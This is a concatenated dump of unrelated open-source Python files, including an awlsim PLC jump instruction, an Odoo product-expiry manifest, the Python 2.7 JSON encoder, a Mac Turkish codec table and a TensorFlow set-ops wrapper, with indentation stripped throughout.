# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.instructions.main import * #@nocy
from awlsim.core.operators import *
#from awlsim.core.instructions.main cimport * #@cy
class AwlInsn_SPBIN(AwlInsn): #+cdef
__slots__ = ()
def __init__(self, cpu, rawInsn):
AwlInsn.__init__(self, cpu, AwlInsn.TYPE_SPBIN, rawInsn)
self.assertOpCount(1)
if self.ops[0].type != AwlOperator.LBL_REF:
raise AwlSimError("Jump instruction expects label operand")
def run(self):
#@cy cdef S7StatusWord s
s = self.cpu.statusWord
if not s.BIE:
self.cpu.jumpToLabel(self.ops[0].labelIndex)
s.OR, s.STA, s.NER = 0, 1, 0
|
randomshinichi/QRL | refs/heads/master | src/qrl/crypto/__init__.py | 5 | # coding=utf-8
# Python hash signature library (quantum resistant)
|
shaufi/odoo | refs/heads/8.0 | addons/product_expiry/__openerp__.py | 260 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Products Expiry Date',
'version' : '1.0',
'author' : 'OpenERP SA',
'category' : 'Specific Industry Applications',
'website': 'https://www.odoo.com',
'depends' : ['stock'],
'demo' : ['product_expiry_demo.xml'],
'description': """
Track different dates on products and production lots.
======================================================
Following dates can be tracked:
-------------------------------
- end of life
- best before date
- removal date
- alert date
Also implements the removal strategy First Expiry First Out (FEFO) widely used, for example, in food industries.
""",
'data' : ['product_expiry_view.xml', 'product_expiry_data.xml'],
'auto_install': False,
'installable': True,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cloudfoundry/php-buildpack-legacy | refs/heads/master | builds/runtimes/python-2.7.6/lib/python2.7/json/encoder.py | 105 | """Implementation of JSONEncoder
"""
import re
try:
from _json import encode_basestring_ascii as c_encode_basestring_ascii
except ImportError:
c_encode_basestring_ascii = None
try:
from _json import make_encoder as c_make_encoder
except ImportError:
c_make_encoder = None
ESCAPE = re.compile(r'[\x00-\x1f\\"\b\f\n\r\t]')
ESCAPE_ASCII = re.compile(r'([\\"]|[^\ -~])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
ESCAPE_DCT = {
'\\': '\\\\',
'"': '\\"',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t',
}
for i in range(0x20):
ESCAPE_DCT.setdefault(chr(i), '\\u{0:04x}'.format(i))
#ESCAPE_DCT.setdefault(chr(i), '\\u%04x' % (i,))
INFINITY = float('inf')
FLOAT_REPR = repr
def encode_basestring(s):
"""Return a JSON representation of a Python string
"""
def replace(match):
return ESCAPE_DCT[match.group(0)]
return '"' + ESCAPE.sub(replace, s) + '"'
def py_encode_basestring_ascii(s):
"""Return an ASCII-only JSON representation of a Python string
"""
if isinstance(s, str) and HAS_UTF8.search(s) is not None:
s = s.decode('utf-8')
def replace(match):
s = match.group(0)
try:
return ESCAPE_DCT[s]
except KeyError:
n = ord(s)
if n < 0x10000:
return '\\u{0:04x}'.format(n)
#return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u{0:04x}\\u{1:04x}'.format(s1, s2)
#return '\\u%04x\\u%04x' % (s1, s2)
return '"' + str(ESCAPE_ASCII.sub(replace, s)) + '"'
encode_basestring_ascii = (
c_encode_basestring_ascii or py_encode_basestring_ascii)
class JSONEncoder(object):
"""Extensible JSON <http://json.org> encoder for Python data structures.
Supports the following objects and types by default:
+-------------------+---------------+
| Python | JSON |
+===================+===============+
| dict | object |
+-------------------+---------------+
| list, tuple | array |
+-------------------+---------------+
| str, unicode | string |
+-------------------+---------------+
| int, long, float | number |
+-------------------+---------------+
| True | true |
+-------------------+---------------+
| False | false |
+-------------------+---------------+
| None | null |
+-------------------+---------------+
To extend this to recognize other objects, subclass and implement a
``.default()`` method with another method that returns a serializable
object for ``o`` if possible, otherwise it should call the superclass
implementation (to raise ``TypeError``).
"""
item_separator = ', '
key_separator = ': '
def __init__(self, skipkeys=False, ensure_ascii=True,
check_circular=True, allow_nan=True, sort_keys=False,
indent=None, separators=None, encoding='utf-8', default=None):
"""Constructor for JSONEncoder, with sensible defaults.
If skipkeys is false, then it is a TypeError to attempt
encoding of keys that are not str, int, long, float or None. If
skipkeys is True, such items are simply skipped.
If *ensure_ascii* is true (the default), all non-ASCII
characters in the output are escaped with \uXXXX sequences,
and the results are str instances consisting of ASCII
characters only. If ensure_ascii is False, a result may be a
unicode instance. This usually happens if the input contains
unicode strings or the *encoding* parameter is used.
If check_circular is true, then lists, dicts, and custom encoded
objects will be checked for circular references during encoding to
prevent an infinite recursion (which would cause an OverflowError).
Otherwise, no such check takes place.
If allow_nan is true, then NaN, Infinity, and -Infinity will be
encoded as such. This behavior is not JSON specification compliant,
but is consistent with most JavaScript based encoders and decoders.
Otherwise, it will be a ValueError to encode such floats.
If sort_keys is true, then the output of dictionaries will be
sorted by key; this is useful for regression tests to ensure
that JSON serializations can be compared on a day-to-day basis.
If indent is a non-negative integer, then JSON array
elements and object members will be pretty-printed with that
indent level. An indent level of 0 will only insert newlines.
None is the most compact representation. Since the default
item separator is ', ', the output might include trailing
whitespace when indent is specified. You can use
separators=(',', ': ') to avoid this.
If specified, separators should be a (item_separator, key_separator)
tuple. The default is (', ', ': '). To get the most compact JSON
representation you should specify (',', ':') to eliminate whitespace.
If specified, default is a function that gets called for objects
that can't otherwise be serialized. It should return a JSON encodable
version of the object or raise a ``TypeError``.
If encoding is not None, then all input strings will be
transformed into unicode using that encoding prior to JSON-encoding.
The default is UTF-8.
"""
self.skipkeys = skipkeys
self.ensure_ascii = ensure_ascii
self.check_circular = check_circular
self.allow_nan = allow_nan
self.sort_keys = sort_keys
self.indent = indent
if separators is not None:
self.item_separator, self.key_separator = separators
if default is not None:
self.default = default
self.encoding = encoding
def default(self, o):
"""Implement this method in a subclass such that it returns
a serializable object for ``o``, or calls the base implementation
(to raise a ``TypeError``).
For example, to support arbitrary iterators, you could
implement default like this::
def default(self, o):
try:
iterable = iter(o)
except TypeError:
pass
else:
return list(iterable)
# Let the base class default method raise the TypeError
return JSONEncoder.default(self, o)
"""
raise TypeError(repr(o) + " is not JSON serializable")
def encode(self, o):
"""Return a JSON string representation of a Python data structure.
>>> JSONEncoder().encode({"foo": ["bar", "baz"]})
'{"foo": ["bar", "baz"]}'
"""
# This is for extremely simple cases and benchmarks.
if isinstance(o, basestring):
if isinstance(o, str):
_encoding = self.encoding
if (_encoding is not None
and not (_encoding == 'utf-8')):
o = o.decode(_encoding)
if self.ensure_ascii:
return encode_basestring_ascii(o)
else:
return encode_basestring(o)
# This doesn't pass the iterator directly to ''.join() because the
# exceptions aren't as detailed. The list call should be roughly
# equivalent to the PySequence_Fast that ''.join() would do.
chunks = self.iterencode(o, _one_shot=True)
if not isinstance(chunks, (list, tuple)):
chunks = list(chunks)
return ''.join(chunks)
def iterencode(self, o, _one_shot=False):
"""Encode the given object and yield each string
representation as available.
For example::
for chunk in JSONEncoder().iterencode(bigobject):
mysocket.write(chunk)
"""
if self.check_circular:
markers = {}
else:
markers = None
if self.ensure_ascii:
_encoder = encode_basestring_ascii
else:
_encoder = encode_basestring
if self.encoding != 'utf-8':
def _encoder(o, _orig_encoder=_encoder, _encoding=self.encoding):
if isinstance(o, str):
o = o.decode(_encoding)
return _orig_encoder(o)
def floatstr(o, allow_nan=self.allow_nan,
_repr=FLOAT_REPR, _inf=INFINITY, _neginf=-INFINITY):
# Check for specials. Note that this type of test is processor
# and/or platform-specific, so do tests which don't depend on the
# internals.
if o != o:
text = 'NaN'
elif o == _inf:
text = 'Infinity'
elif o == _neginf:
text = '-Infinity'
else:
return _repr(o)
if not allow_nan:
raise ValueError(
"Out of range float values are not JSON compliant: " +
repr(o))
return text
if (_one_shot and c_make_encoder is not None
and self.indent is None and not self.sort_keys):
_iterencode = c_make_encoder(
markers, self.default, _encoder, self.indent,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, self.allow_nan)
else:
_iterencode = _make_iterencode(
markers, self.default, _encoder, self.indent, floatstr,
self.key_separator, self.item_separator, self.sort_keys,
self.skipkeys, _one_shot)
return _iterencode(o, 0)
def _make_iterencode(markers, _default, _encoder, _indent, _floatstr,
_key_separator, _item_separator, _sort_keys, _skipkeys, _one_shot,
## HACK: hand-optimized bytecode; turn globals into locals
ValueError=ValueError,
basestring=basestring,
dict=dict,
float=float,
id=id,
int=int,
isinstance=isinstance,
list=list,
long=long,
str=str,
tuple=tuple,
):
def _iterencode_list(lst, _current_indent_level):
if not lst:
yield '[]'
return
if markers is not None:
markerid = id(lst)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = lst
buf = '['
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (' ' * (_indent * _current_indent_level))
separator = _item_separator + newline_indent
buf += newline_indent
else:
newline_indent = None
separator = _item_separator
first = True
for value in lst:
if first:
first = False
else:
buf = separator
if isinstance(value, basestring):
yield buf + _encoder(value)
elif value is None:
yield buf + 'null'
elif value is True:
yield buf + 'true'
elif value is False:
yield buf + 'false'
elif isinstance(value, (int, long)):
yield buf + str(value)
elif isinstance(value, float):
yield buf + _floatstr(value)
else:
yield buf
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (_indent * _current_indent_level))
yield ']'
if markers is not None:
del markers[markerid]
def _iterencode_dict(dct, _current_indent_level):
if not dct:
yield '{}'
return
if markers is not None:
markerid = id(dct)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = dct
yield '{'
if _indent is not None:
_current_indent_level += 1
newline_indent = '\n' + (' ' * (_indent * _current_indent_level))
item_separator = _item_separator + newline_indent
yield newline_indent
else:
newline_indent = None
item_separator = _item_separator
first = True
if _sort_keys:
items = sorted(dct.items(), key=lambda kv: kv[0])
else:
items = dct.iteritems()
for key, value in items:
if isinstance(key, basestring):
pass
# JavaScript is weakly typed for these, so it makes sense to
# also allow them. Many encoders seem to do something like this.
elif isinstance(key, float):
key = _floatstr(key)
elif key is True:
key = 'true'
elif key is False:
key = 'false'
elif key is None:
key = 'null'
elif isinstance(key, (int, long)):
key = str(key)
elif _skipkeys:
continue
else:
raise TypeError("key " + repr(key) + " is not a string")
if first:
first = False
else:
yield item_separator
yield _encoder(key)
yield _key_separator
if isinstance(value, basestring):
yield _encoder(value)
elif value is None:
yield 'null'
elif value is True:
yield 'true'
elif value is False:
yield 'false'
elif isinstance(value, (int, long)):
yield str(value)
elif isinstance(value, float):
yield _floatstr(value)
else:
if isinstance(value, (list, tuple)):
chunks = _iterencode_list(value, _current_indent_level)
elif isinstance(value, dict):
chunks = _iterencode_dict(value, _current_indent_level)
else:
chunks = _iterencode(value, _current_indent_level)
for chunk in chunks:
yield chunk
if newline_indent is not None:
_current_indent_level -= 1
yield '\n' + (' ' * (_indent * _current_indent_level))
yield '}'
if markers is not None:
del markers[markerid]
def _iterencode(o, _current_indent_level):
if isinstance(o, basestring):
yield _encoder(o)
elif o is None:
yield 'null'
elif o is True:
yield 'true'
elif o is False:
yield 'false'
elif isinstance(o, (int, long)):
yield str(o)
elif isinstance(o, float):
yield _floatstr(o)
elif isinstance(o, (list, tuple)):
for chunk in _iterencode_list(o, _current_indent_level):
yield chunk
elif isinstance(o, dict):
for chunk in _iterencode_dict(o, _current_indent_level):
yield chunk
else:
if markers is not None:
markerid = id(o)
if markerid in markers:
raise ValueError("Circular reference detected")
markers[markerid] = o
o = _default(o)
for chunk in _iterencode(o, _current_indent_level):
yield chunk
if markers is not None:
del markers[markerid]
return _iterencode
|
eckucukoglu/arm-linux-gnueabihf | refs/heads/master | arm-linux-gnueabihf/libc/usr/lib/python2.7/encodings/mac_turkish.py | 593 | """ Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-turkish',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u2020' # 0xA0 -> DAGGER
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u011e' # 0xDA -> LATIN CAPITAL LETTER G WITH BREVE
u'\u011f' # 0xDB -> LATIN SMALL LETTER G WITH BREVE
u'\u0130' # 0xDC -> LATIN CAPITAL LETTER I WITH DOT ABOVE
u'\u0131' # 0xDD -> LATIN SMALL LETTER DOTLESS I
u'\u015e' # 0xDE -> LATIN CAPITAL LETTER S WITH CEDILLA
u'\u015f' # 0xDF -> LATIN SMALL LETTER S WITH CEDILLA
u'\u2021' # 0xE0 -> DOUBLE DAGGER
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\uf8a0' # 0xF5 -> undefined1
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
xodus7/tensorflow | refs/heads/master | tensorflow/contrib/metrics/python/ops/set_ops.py | 167 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python layer for set_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops import sets
set_size = sets.set_size
set_intersection = sets.set_intersection
set_difference = sets.set_difference
set_union = sets.set_union
|
angelblue05/xbmc | refs/heads/master | tools/EventClients/examples/python/example_button1.py | 70 | #!/usr/bin/python
# This is a simple example showing how you can send 2 button events
